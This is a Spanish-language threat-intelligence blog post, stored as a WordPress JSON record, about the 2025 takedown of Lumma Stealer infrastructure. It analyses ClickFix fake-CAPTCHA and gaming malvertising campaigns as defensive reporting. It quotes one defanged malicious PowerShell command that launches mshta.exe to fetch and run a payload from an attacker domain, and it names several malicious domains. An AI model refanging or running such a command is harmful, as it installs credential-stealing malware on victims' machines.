{"id":10734,"date":"2025-05-22T13:31:31","date_gmt":"2025-05-22T19:31:31","guid":{"rendered":"https:\/\/beaconlab.us\/?p=10734"},"modified":"2025-05-22T13:34:31","modified_gmt":"2025-05-22T19:34:31","slug":"operacion-de-takedown-sobre-malware-lumma-stealer","status":"publish","type":"post","link":"https:\/\/beaconlab.us\/es\/operacion-de-takedown-sobre-malware-lumma-stealer\/","title":{"rendered":"Operaci\u00f3n de Takedown sobre malware Lumma Stealer"},"content":{"rendered":"\n<p>Una operaci\u00f3n de takedown se llevo acab\u00f3 para desarticular la infraestructura utilizada por el malware stealer llamado Lumma, dicha operaci\u00f3n fue liderada por la Unidad de Delitos Digitales (DCU) de Microsoft y sus socios internacionales (<a href=\"https:\/\/www.welivesecurity.com\/en\/eset-research\/eset-takes-part-global-operation-disrupt-lumma-stealer\">ESET<\/a>&nbsp;,&nbsp;<a href=\"https:\/\/www.bitsight.com\/blog\/lumma-stealer-is-out-of-business\">Bitsight<\/a>&nbsp;,&nbsp;<a href=\"https:\/\/www.lumen.com\/en-us\/solutions\/connected-security.html\">Lumen<\/a>&nbsp;,&nbsp;<a href=\"https:\/\/cloudflare.com\/threat-intelligence\/research\/report\/cloudflare-participates-in-joint-operation-to-disrupt-lumma-stealer\/\">Cloudflare<\/a>&nbsp;,&nbsp;<a href=\"https:\/\/cleandns.com\/battling-lumma-stealer-malware\/\">CleanDNS<\/a>&nbsp;y&nbsp;<a href=\"https:\/\/www.gmoregistry.com\/en\/\">GMO Registry<\/a>).<\/p>\n\n\n\n<p>Lumma Stealer (tambi\u00e9n conocido como LummaC2 Stealer) es un malware (malicious software) creado para robar informaci\u00f3n, ya sean credenciales almacenadas en el sitema operativo y navegadores, adem\u00e1s tambi\u00e9n tiene capacidades para robar tarjetas de cr\u00e9dito, cuentas bancarias, todo esto esta disponible a trav\u00e9s de un modelo de Malware como Servicio (MaaS) en foros de habla rusa desde al menos agosto de 2022. Ataca principalmente a monederos de criptomonedas y extensiones de navegador con autenticaci\u00f3n de dos factores (2FA), antes de robar informaci\u00f3n confidencial del equipo de la v\u00edctima. Una vez obtenidos los datos, se exfiltran a un servidor C2 mediante solicitudes HTTP POST utilizando el agente de usuario \u00abTeslaBrowser\/5.5\u00bb. El ladr\u00f3n tambi\u00e9n cuenta con un dropper (cargador) no residente capaz de entregar cargas \u00fatiles adicionales mediante archivos EXE, DLL y PowerShell.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"924\" height=\"433\" data-id=\"10735\" src=\"https:\/\/beaconlab.us\/wp-content\/uploads\/2025\/05\/Imagen-1-1.png\" alt=\"\" class=\"wp-image-10735\" srcset=\"https:\/\/beaconlab.us\/wp-content\/uploads\/2025\/05\/Imagen-1-1.png 924w, https:\/\/beaconlab.us\/wp-content\/uploads\/2025\/05\/Imagen-1-1-300x141.png 300w, https:\/\/beaconlab.us\/wp-content\/uploads\/2025\/05\/Imagen-1-1-768x360.png 768w\" sizes=\"(max-width: 924px) 100vw, 924px\" \/><figcaption class=\"wp-element-caption\">Ilustraci\u00f3n&nbsp;1&nbsp;Captura de pantalla diferentes niveles de servicio ofreccido como Lumma MaaS. Tambi\u00e9n se adjunto logitipo del marketing de Lumma.<\/figcaption><\/figure>\n<\/figure>\n\n\n\n<p class=\"has-small-font-size\"><\/p>\n\n\n\n<p>Mediante una orden judicial otorgada por el Tribunal de Distrito de los Estados Unidos del Distrito Norte de Georgia, la DCU de Microsoft incaut\u00f3 y facilit\u00f3 la desactivaci\u00f3n, suspensi\u00f3n y bloqueo de aproximadamente 2300 dominios maliciosos que constitu\u00edan la columna vertebral de la infraestructura de Lumma.&nbsp;<\/p>\n\n\n\n<p>El takedown se llevo acabo entre el 16 de marzo y el 16 de mayo de 2025, se identific\u00f3 m\u00e1s de 394.000 ordenadores Windows infectados por el malware Lumma en todo el mundo. Adem\u00e1s, tambi\u00e9n se han confiscado o transfiridos a Microsoft m\u00e1s de 1.300 dominios, incluidos 300 dominios intervenidos por las fuerzas del orden con el apoyo de Europol, ser\u00e1n redirigidos a los sumideros (sinkholes) de Microsoft.&nbsp;<\/p>\n\n\n\n<p>Esta acci\u00f3n conjunta est\u00e1 dise\u00f1ada para ralentizar la velocidad con la que estos actores pueden lanzar sus ataques, minimizar la eficacia de sus campa\u00f1as y obstaculizar sus beneficios il\u00edcitos al recortar una importante fuente de ingresos.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-2 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"629\" data-id=\"10737\" src=\"https:\/\/beaconlab.us\/wp-content\/uploads\/2025\/05\/Imagen-2-1024x629.jpg\" alt=\"\" class=\"wp-image-10737\" srcset=\"https:\/\/beaconlab.us\/wp-content\/uploads\/2025\/05\/Imagen-2-1024x629.jpg 1024w, https:\/\/beaconlab.us\/wp-content\/uploads\/2025\/05\/Imagen-2-300x184.jpg 300w, https:\/\/beaconlab.us\/wp-content\/uploads\/2025\/05\/Imagen-2-768x472.jpg 768w, https:\/\/beaconlab.us\/wp-content\/uploads\/2025\/05\/Imagen-2.jpg 1133w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\">Ilustraci\u00f3n&nbsp;2&nbsp;Mapa de calor que detalla la progagaci\u00f3n global de infecciones y encuentros de malware Lumma Stealer en dispositivos Windows. Fuente: Microsoft<\/figcaption><\/figure>\n<\/figure>\n\n\n\n<p class=\"has-small-font-size\"><\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-3 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"775\" height=\"395\" data-id=\"10739\" src=\"https:\/\/beaconlab.us\/wp-content\/uploads\/2025\/05\/Imagen-3.png\" alt=\"\" class=\"wp-image-10739\" srcset=\"https:\/\/beaconlab.us\/wp-content\/uploads\/2025\/05\/Imagen-3.png 775w, https:\/\/beaconlab.us\/wp-content\/uploads\/2025\/05\/Imagen-3-300x153.png 300w, https:\/\/beaconlab.us\/wp-content\/uploads\/2025\/05\/Imagen-3-768x391.png 768w\" sizes=\"(max-width: 775px) 100vw, 775px\" \/><figcaption class=\"wp-element-caption\">Ilustraci\u00f3n&nbsp;3&nbsp;P\u00e1gina de bienvenida mostrada en mas de 900 dominios confiscados por Microsoft<\/figcaption><\/figure>\n<\/figure>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"has-small-font-size\"><\/p>\n<\/blockquote>\n\n\n\n<p>Normalmente, el objetivo de los operadores de Lumma es monetizar la informaci\u00f3n robada o explotarla con diversos fines. Lumma es f\u00e1cil de distribuir, dif\u00edcil de detectar y puede programarse para eludir ciertas defensas de seguridad, lo que lo convierte en una herramienta predilecta para ciberdelincuentes y actores de amenazas en l\u00ednea, incluyendo prol\u00edficos actores de ransomware como&nbsp;Octo Tempest&nbsp;(Scattered Spider)&nbsp;<a href=\"applewebdata:\/\/FEF6064D-C381-4228-84FC-8DEA9735A546#_ftn1\"><sup>[1]<\/sup><\/a>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"384\" src=\"https:\/\/beaconlab.us\/wp-content\/uploads\/2025\/05\/Imagen-4-1024x384.png\" alt=\"\" class=\"wp-image-10741\" srcset=\"https:\/\/beaconlab.us\/wp-content\/uploads\/2025\/05\/Imagen-4-1024x384.png 1024w, https:\/\/beaconlab.us\/wp-content\/uploads\/2025\/05\/Imagen-4-300x112.png 300w, https:\/\/beaconlab.us\/wp-content\/uploads\/2025\/05\/Imagen-4-768x288.png 768w, https:\/\/beaconlab.us\/wp-content\/uploads\/2025\/05\/Imagen-4-1536x576.png 1536w, https:\/\/beaconlab.us\/wp-content\/uploads\/2025\/05\/Imagen-4.png 1796w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\">Ilustraci\u00f3n 4 Ejemplo de un correo de phishing de Booking.com y solicitud falsa de verificaci\u00f3n CAPTCHA.<\/figcaption><\/figure>\n\n\n\n<p class=\"has-small-font-size\"><\/p>\n\n\n\n<p>El malware suplanta la identidad de marcas de confianza, como Microsoft, Booking.com<a href=\"applewebdata:\/\/FEF6064D-C381-4228-84FC-8DEA9735A546#_ftn2\"><sup>[2]<\/sup><\/a>&nbsp;entre otros, y se distribuye mediante&nbsp;correos electr\u00f3nicos de phishing selectivo&nbsp;y&nbsp;malvertising<a href=\"applewebdata:\/\/FEF6064D-C381-4228-84FC-8DEA9735A546#_ftn3\"><sup>[3]<\/sup><\/a>, entre otros vectores.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">An\u00e1lisis de campa\u00f1as de malware&nbsp;:<\/h2>\n\n\n\n<p>Dentro de las compa\u00f1as de malware llevadas acabo con la infraestructura de Lumma Stealer,&nbsp;se&nbsp;han identificado varios tipos de campa\u00f1as como com\u00fan denominador, a continuaci\u00f3n hacemos un analisis de algunas campa\u00f1as&nbsp;&nbsp;mas relevantes.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Campa\u00f1as de CAPTCHA o ClickFix<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\">Resumen de los hallazgos<\/h4>\n\n\n\n<p><strong>Vector de ataque:<\/strong>&nbsp;p\u00e1ginas reCAPTCHA falsas en Tigris Object Storage, OCI Object Storage y Scaleway Object Storage&nbsp;<\/p>\n\n\n\n<p><strong>M\u00e9todo:<\/strong>&nbsp;Usuarios enga\u00f1ados para ejecutar PowerShell inyectado en el portapapeles a trav\u00e9s de Windows + R&nbsp;<\/p>\n\n\n\n<p><strong>Ejecuci\u00f3n:<\/strong>&nbsp;PowerShell inicia mshta.exe para recuperar el troyano disfrazado (sports[.]mp4)&nbsp;<\/p>\n\n\n\n<p><strong>T\u00e9cnicas utilizadas&nbsp;(MITRE ATT&amp;CK):&nbsp;<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>T1583.006: Adquisici\u00f3n de Infraestructura \u2013 Servicios Web&nbsp;<\/li>\n\n\n\n<li>T1204.004: Ejecuci\u00f3n del usuario: Copiar y pegar malicioso&nbsp;<\/li>\n\n\n\n<li>T1059.001: Int\u00e9rprete de comandos y scripts: PowerShell&nbsp;<\/li>\n\n\n\n<li>T1218.005: Ejecuci\u00f3n de proxy binario firmado (mshta.exe)&nbsp;<\/li>\n\n\n\n<li>T1036.008: Enmascaramiento: Tipo de archivo de enmascaramiento&nbsp;<\/li>\n<\/ul>\n\n\n\n<h4 class=\"wp-block-heading\">An\u00e1lisis<\/h4>\n\n\n\n<p>Se han observado ataques dirigidos a organizaciones cuyas v\u00edctimas eran redirigidas a Tigris Object Storage (un servicio de almacenamiento de objetos con cach\u00e9 global y compatible con S3) que alojaba p\u00e1ginas falsas de verificaci\u00f3n humana (CAPTCHA). Estas p\u00e1ginas indicaban a los usuarios que presionaran&nbsp;<em>Windows + R<\/em>para abrir el cuadro de di\u00e1logo Ejecutar y, sin saberlo, ejecutaran un comando malicioso de PowerShell copiado en su portapapeles, como se muestra en la siguiente imagen.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-4 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"374\" height=\"400\" data-id=\"10743\" src=\"https:\/\/beaconlab.us\/wp-content\/uploads\/2025\/05\/Imagen-5.png\" alt=\"\" class=\"wp-image-10743\" srcset=\"https:\/\/beaconlab.us\/wp-content\/uploads\/2025\/05\/Imagen-5.png 374w, https:\/\/beaconlab.us\/wp-content\/uploads\/2025\/05\/Imagen-5-281x300.png 281w\" sizes=\"(max-width: 374px) 100vw, 374px\" \/><figcaption class=\"wp-element-caption\">Ilustraci\u00f3n&nbsp;5&nbsp;P\u00e1gina reCAPTCHA falsa alojada en Tigris Object Storage. Fuente Cato<\/figcaption><\/figure>\n<\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Comando malicioso de PowerShell enviado a trav\u00e9s del portapapeles:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\"C:\\\\WINDOWS\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell.exe\" -w 1 -C \"$l='hxxps&#91;:\/\/]amacys&#91;.]shop\/sports&#91;.]mp4';Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine=('ms' + 'hta' + '.exe '+$l)}\" #&nbsp;\u2705&nbsp;''I am not a robot: CAPTCHA Verification UID: 7811'\u201d&nbsp;<\/code><\/pre>\n\n\n\n<p>Tambi\u00e9n, el equipo de Microsoft detect\u00f3 un grupo de sitios web comprometidos que utilizaban las t\u00e9cnicas EtherHiding y ClickFix para instalar Lumma Stealer:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>EtherHiding es una t\u00e9cnica que implica el uso de contratos inteligentes en plataformas blockchain como Binance Smart Chain (BSC) para alojar fragmentos de c\u00f3digo malicioso. Los m\u00e9todos tradicionales de bloqueo de c\u00f3digo malicioso, como el bloqueo de IP o dominios o las detecciones basadas en contenido, son menos eficaces contra EtherHiding porque el c\u00f3digo est\u00e1 incrustado y distribuido en la blockchain.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Mientras tanto, con la t\u00e9cnica ClickFix, un actor de amenazas intenta aprovecharse de la capacidad humana (avisos CAPTCHA) para resolver problemas mostrando mensajes de error falsos o avisos que instruyen a los usuarios objetivo a solucionar los problemas copiando, pegando y ejecutando comandos que finalmente resultan en la descarga de malware.<\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-5 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"698\" data-id=\"10745\" src=\"https:\/\/beaconlab.us\/wp-content\/uploads\/2025\/05\/Imagen-6-1024x698.png\" alt=\"\" class=\"wp-image-10745\" srcset=\"https:\/\/beaconlab.us\/wp-content\/uploads\/2025\/05\/Imagen-6-1024x698.png 1024w, https:\/\/beaconlab.us\/wp-content\/uploads\/2025\/05\/Imagen-6-300x204.png 300w, https:\/\/beaconlab.us\/wp-content\/uploads\/2025\/05\/Imagen-6-768x523.png 768w, https:\/\/beaconlab.us\/wp-content\/uploads\/2025\/05\/Imagen-6.png 1353w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\">Ilustraci\u00f3n&nbsp;6&nbsp;Flujo de ataque de ClickFix a Lumma Stealer. Fuente: Microsoft<\/figcaption><\/figure>\n<\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>En esta campa\u00f1a, el JavaScript inyectado en los sitios web comprometidos contactaba directamente con BSC para recuperar el c\u00f3digo y el se\u00f1uelo de ClickFix, que se presentaba al objetivo. Los usuarios deb\u00edan hacer clic en el mensaje \u00abNo soy un robot\u00bb, tras lo cual se copiaba un comando en su portapapeles. Se les indicaba que pegaran y ejecutaran este comando mediante el s\u00edmbolo&nbsp;<em>del sistema<\/em>&nbsp;de Windows . El comando descargaba e iniciaba c\u00f3digo adicional usando&nbsp;<em>mshta<\/em>&nbsp;de&nbsp;<em>check.foquh[.]icu.<\/em><\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-6 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"810\" height=\"582\" data-id=\"10747\" src=\"https:\/\/beaconlab.us\/wp-content\/uploads\/2025\/05\/Imagen-7.png\" alt=\"\" class=\"wp-image-10747\" srcset=\"https:\/\/beaconlab.us\/wp-content\/uploads\/2025\/05\/Imagen-7.png 810w, https:\/\/beaconlab.us\/wp-content\/uploads\/2025\/05\/Imagen-7-300x216.png 300w, https:\/\/beaconlab.us\/wp-content\/uploads\/2025\/05\/Imagen-7-768x552.png 768w\" sizes=\"(max-width: 810px) 100vw, 810px\" \/><figcaption class=\"wp-element-caption\">Ilustraci\u00f3n&nbsp;7&nbsp;El sitio web comprometido utiliz\u00f3 las t\u00e9cnicas EtherHiding y ClickFix para presentar un CAPTCHA falso a los visitantes. Fuente: Microsoft<\/figcaption><\/figure>\n<\/figure>\n\n\n\n<p><\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-7 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"716\" height=\"514\" data-id=\"10749\" src=\"https:\/\/beaconlab.us\/wp-content\/uploads\/2025\/05\/Imagen-8.png\" alt=\"\" class=\"wp-image-10749\" srcset=\"https:\/\/beaconlab.us\/wp-content\/uploads\/2025\/05\/Imagen-8.png 716w, https:\/\/beaconlab.us\/wp-content\/uploads\/2025\/05\/Imagen-8-300x215.png 300w\" sizes=\"(max-width: 716px) 100vw, 716px\" \/><figcaption class=\"wp-element-caption\">Ilustraci\u00f3n&nbsp;8&nbsp;Esta p\u00e1gina de verificaci\u00f3n falsa es la parte final de la t\u00e9cnica ClickFix. Indica a los usuarios c\u00f3mo ejecutar un comando malicioso. El comando se copi\u00f3 silenciosamente en su portapapeles durante el paso anterior, al hacer clic en \u00abNo soy un robot\u00bb. Fuente: Microsoft<\/figcaption><\/figure>\n<\/figure>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Campa\u00f1a contra Gamers&nbsp;<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\">Resumen de los hallazgos<\/h4>\n\n\n\n<p><strong>Vector de ataque&nbsp;:&nbsp;<\/strong>Malvertising y suplantaci\u00f3n de marca&nbsp;<\/p>\n\n\n\n<p><strong>T\u00e9cnicas utilizadas&nbsp;(MITRE ATT&amp;CK):&nbsp;<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>T1204.004: Ejecuci\u00f3n del usuario: Copiar y pegar malicioso&nbsp;<\/li>\n\n\n\n<li>T1059.003: Int\u00e9rprete de comandos y secuencias de comandos \u2013 Shell de comandos de Windows&nbsp;<\/li>\n\n\n\n<li>T1059.010: Int\u00e9rprete de comandos y scripts \u2013 AutoHotKey y AutoIT&nbsp;<\/li>\n\n\n\n<li>T1574.001: Flujo de ejecuci\u00f3n de secuestro: secuestro del orden de b\u00fasqueda de DLL&nbsp;<\/li>\n\n\n\n<li>T1036: Enmascaramiento (uso de un dominio similar a Steam)&nbsp;<\/li>\n\n\n\n<li>T1036.001: Enmascaramiento \u2013 Firma de c\u00f3digo no v\u00e1lida&nbsp;<\/li>\n\n\n\n<li>T1027.013: Archivos o informaci\u00f3n ofuscados \u2013 Archivo cifrado\/codificado&nbsp;<\/li>\n\n\n\n<li>T1518.001: Descubrimiento de software \u2013 Descubrimiento de software de seguridad&nbsp;<\/li>\n<\/ul>\n\n\n\n<p><strong>P\u00fablico objetivo&nbsp;:&nbsp;<\/strong>Entusiastas de los videojuegos&nbsp;<\/p>\n\n\n\n<p><strong>Dominio malicioso&nbsp;:&nbsp;<\/strong>my-steamunlocked[.]online (imitando a Steam)&nbsp;<\/p>\n\n\n\n<p><strong>M\u00e9todo de acceso inicial&nbsp;:<\/strong>&nbsp;Descargas de juegos falsos distribuidas a trav\u00e9s de anuncios enga\u00f1osos&nbsp;<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">An\u00e1lisis<\/h4>\n\n\n\n<p>Se ha detectado una campa\u00f1a de distribuci\u00f3n del malware Lumma Stealer que utilizaba publicidad maliciosa para comprometer a sus v\u00edctimas. Los actores de amenazas utilizaban anuncios maliciosos que se hac\u00edan pasar por promociones leg\u00edtimas de software, dirigidos espec\u00edficamente a entusiastas de los videojuegos, especialmente usuarios de la plataforma Steam. Se ha que la cadena de ataque redirig\u00eda a los usuarios de wq24-1[.]g-site[.]store a my-steamunlocked[.]online, un dominio dise\u00f1ado para imitar la plataforma Steam. Usuarios desprevenidos, creyendo que estaban descargando un juego gratuito, iniciaron la descarga de la carga \u00fatil de Lumma Stealer, como se muestra en la siguiente imagen.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-8 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"884\" height=\"136\" data-id=\"10751\" src=\"https:\/\/beaconlab.us\/wp-content\/uploads\/2025\/05\/Imagen-9.png\" alt=\"\" class=\"wp-image-10751\" srcset=\"https:\/\/beaconlab.us\/wp-content\/uploads\/2025\/05\/Imagen-9.png 884w, https:\/\/beaconlab.us\/wp-content\/uploads\/2025\/05\/Imagen-9-300x46.png 300w, https:\/\/beaconlab.us\/wp-content\/uploads\/2025\/05\/Imagen-9-768x118.png 768w\" sizes=\"(max-width: 884px) 100vw, 884px\" \/><figcaption class=\"wp-element-caption\">Ilustraci\u00f3n&nbsp;9&nbsp;Entrega de malware camuflado en una descarga gratuita de un juego<\/figcaption><\/figure>\n<\/figure>\n\n\n\n<p>Al hacer clic en el enlace, se le pide a la v\u00edctima que copie una URL que apunta a Mega, un proveedor leg\u00edtimo de almacenamiento en la nube, para descargar un archivo comprimido malicioso protegido con contrase\u00f1a con un nombre de archivo inusualmente largo.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-9 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"370\" height=\"420\" data-id=\"10753\" src=\"https:\/\/beaconlab.us\/wp-content\/uploads\/2025\/05\/Imagen-10.png\" alt=\"\" class=\"wp-image-10753\" srcset=\"https:\/\/beaconlab.us\/wp-content\/uploads\/2025\/05\/Imagen-10.png 370w, https:\/\/beaconlab.us\/wp-content\/uploads\/2025\/05\/Imagen-10-264x300.png 264w\" sizes=\"(max-width: 370px) 100vw, 370px\" \/><figcaption class=\"wp-element-caption\">Ilustraci\u00f3n&nbsp;10&nbsp;Redirecci\u00f3n a my-steamunlocked[.]online imitando la plataforma Steam<\/figcaption><\/figure>\n<\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Archivo descargado:&nbsp;&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"613\" src=\"https:\/\/beaconlab.us\/wp-content\/uploads\/2025\/05\/Imagen-11-1024x613.png\" alt=\"\" class=\"wp-image-10755\" srcset=\"https:\/\/beaconlab.us\/wp-content\/uploads\/2025\/05\/Imagen-11-1024x613.png 1024w, https:\/\/beaconlab.us\/wp-content\/uploads\/2025\/05\/Imagen-11-300x180.png 300w, https:\/\/beaconlab.us\/wp-content\/uploads\/2025\/05\/Imagen-11-768x460.png 768w, https:\/\/beaconlab.us\/wp-content\/uploads\/2025\/05\/Imagen-11-1536x920.png 1536w, https:\/\/beaconlab.us\/wp-content\/uploads\/2025\/05\/Imagen-11.png 2035w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\">Ilustraci\u00f3n&nbsp;11&nbsp;Secuestro de DLL a trav\u00e9s de SETUP.exe firmado por Microsoft usando LOLBins<\/figcaption><\/figure>\n\n\n\n<p>El binario SETUP.exe ejecuta una serie de scripts ofuscados, varios camuflados como archivos .WAV generalmente utilizados como archivos de sonidos tecnicas utilizadas para evitar los EDR\/XDR, adem\u00e1s de herramientas legitimas del sistema, como AutoIt3. Si bien AutoIt3.exe es leg\u00edtimo, hemos observado que se utiliza para ofuscar malware, actuar como cargador e integrarse en procesos confiables del sistema, lo que coincide con las t\u00e9cnicas de \u00abliving off the land\u00bb (LOTL).&nbsp;<\/p>\n\n\n\n<p>Construcci\u00f3n de scripts mediante archivos WAV incrustados.&nbsp;<br>Hay evidencia que el script combina varios archivos .wav para crear un nuevo archivo, n.a3x. Estos archivos .wav contienen datos binarios incrustados que, al fusionarse, forman un script compilado de AutoIt. Esta t\u00e9cnica se muestra en la siguiente imagen.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-10 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"592\" height=\"482\" data-id=\"10757\" src=\"https:\/\/beaconlab.us\/wp-content\/uploads\/2025\/05\/Imagen-12.png\" alt=\"\" class=\"wp-image-10757\" srcset=\"https:\/\/beaconlab.us\/wp-content\/uploads\/2025\/05\/Imagen-12.png 592w, https:\/\/beaconlab.us\/wp-content\/uploads\/2025\/05\/Imagen-12-300x244.png 300w\" sizes=\"(max-width: 592px) 100vw, 592px\" \/><figcaption class=\"wp-element-caption\">Ilustraci\u00f3n&nbsp;12&nbsp;Archivos descargados en la carpeta %TEMP%<\/figcaption><\/figure>\n<\/figure>\n\n\n\n<p>Analistas descubrieron que el objetivo final del script es infectar el dispositivo mediante la ejecuci\u00f3n de un script n.a3x de AutoIT altamente ofuscado que contiene la carga \u00fatil de Lumma Stealer<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-11 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"728\" height=\"524\" data-id=\"10759\" src=\"https:\/\/beaconlab.us\/wp-content\/uploads\/2025\/05\/Imagen-13.png\" alt=\"\" class=\"wp-image-10759\" srcset=\"https:\/\/beaconlab.us\/wp-content\/uploads\/2025\/05\/Imagen-13.png 728w, https:\/\/beaconlab.us\/wp-content\/uploads\/2025\/05\/Imagen-13-300x216.png 300w\" sizes=\"(max-width: 728px) 100vw, 728px\" \/><figcaption class=\"wp-element-caption\">Ilustraci\u00f3n&nbsp;15&nbsp;Esta p\u00e1gina de verificaci\u00f3n falsa es la parte final de la t\u00e9cnica ClickFix. Indica a los usuarios c\u00f3mo ejecutar un comando malicioso. El comando se copi\u00f3 silenciosamente en su portapapeles durante el paso anterior, al hacer clic en \u00abNo soy un robot\u00bb.<\/figcaption><\/figure>\n<\/figure>\n\n\n\n<p>Para mas informaci\u00f3n sobre analisis tecnicos hechos por terceros y IoC descubiertos en investigaciones del malware puede encontrar en los siguientes enlace:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"https:\/\/www.catonetworks.com\/blog\/cato-ctrl-suspected-russian-threat-actors\/\">https:\/\/www.catonetworks.com\/blog\/cato-ctrl-suspected-russian-threat-actors\/<\/a><\/li>\n\n\n\n<li>https:\/\/www.microsoft.com\/en-us\/security\/blog\/2025\/05\/21\/lumma-stealer-breaking-down-the-delivery-techniques-and-capabilities-of-a-prolific-infostealer\/<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Referencias:&nbsp;<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>https:\/\/blogs.microsoft.com\/on-the-issues\/2025\/05\/21\/microsoft-leads-global-action-against-favored-cybercrime-tool\/#:~:text=Disrupting%20Lumma%20Stealer%3A%20Microsoft%20leads,tool%20%2D%20Microsoft%20On%20the%20Issues&nbsp;&nbsp;&nbsp;<\/li>\n\n\n\n<li>https:\/\/www.microsoft.com\/en-us\/security\/blog\/2025\/05\/21\/lumma-stealer-breaking-down-the-delivery-techniques-and-capabilities-of-a-prolific-infostealer\/<\/li>\n\n\n\n<li>https:\/\/www.fortinet.com\/blog\/threat-research\/lumma-variant-on-youtube<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p><a href=\"applewebdata:\/\/FEF6064D-C381-4228-84FC-8DEA9735A546#_ftnref1\"><sup>[1]<\/sup><\/a>&nbsp;&nbsp;https:\/\/www.microsoft.com\/en-us\/security\/blog\/2023\/10\/25\/octo-tempest-crosses-boundaries-to-facilitate-extortion-encryption-and-destruction\/<\/p>\n\n\n\n<p><a href=\"applewebdata:\/\/FEF6064D-C381-4228-84FC-8DEA9735A546#_ftnref2\"><sup>[2]<\/sup><\/a>&nbsp;https:\/\/www.microsoft.com\/en-us\/security\/blog\/2025\/03\/13\/phishing-campaign-impersonates-booking-com-delivers-a-suite-of-credential-stealing-malware\/?msockid=356b7a12f0156be706e16f23f1386a52<\/p>\n\n\n\n<p><a href=\"applewebdata:\/\/FEF6064D-C381-4228-84FC-8DEA9735A546#_ftnref3\"><sup>[3]<\/sup><\/a>&nbsp;https:\/\/www.fortinet.com\/blog\/threat-research\/lumma-variant-on-youtube<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Una operaci\u00f3n de takedown se llevo acab\u00f3 para desarticular la infraestructura utilizada por el malware stealer llamado Lumma, dicha operaci\u00f3n fue liderada por la Unidad de Delitos Digitales (DCU) de Microsoft y sus socios internacionales (ESET&nbsp;,&nbsp;Bitsight&nbsp;,&nbsp;Lumen&nbsp;,&nbsp;Cloudflare&nbsp;,&nbsp;CleanDNS&nbsp;y&nbsp;GMO Registry). Lumma Stealer (tambi\u00e9n conocido como LummaC2 Stealer) es un malware (malicious software) creado para robar informaci\u00f3n, ya sean 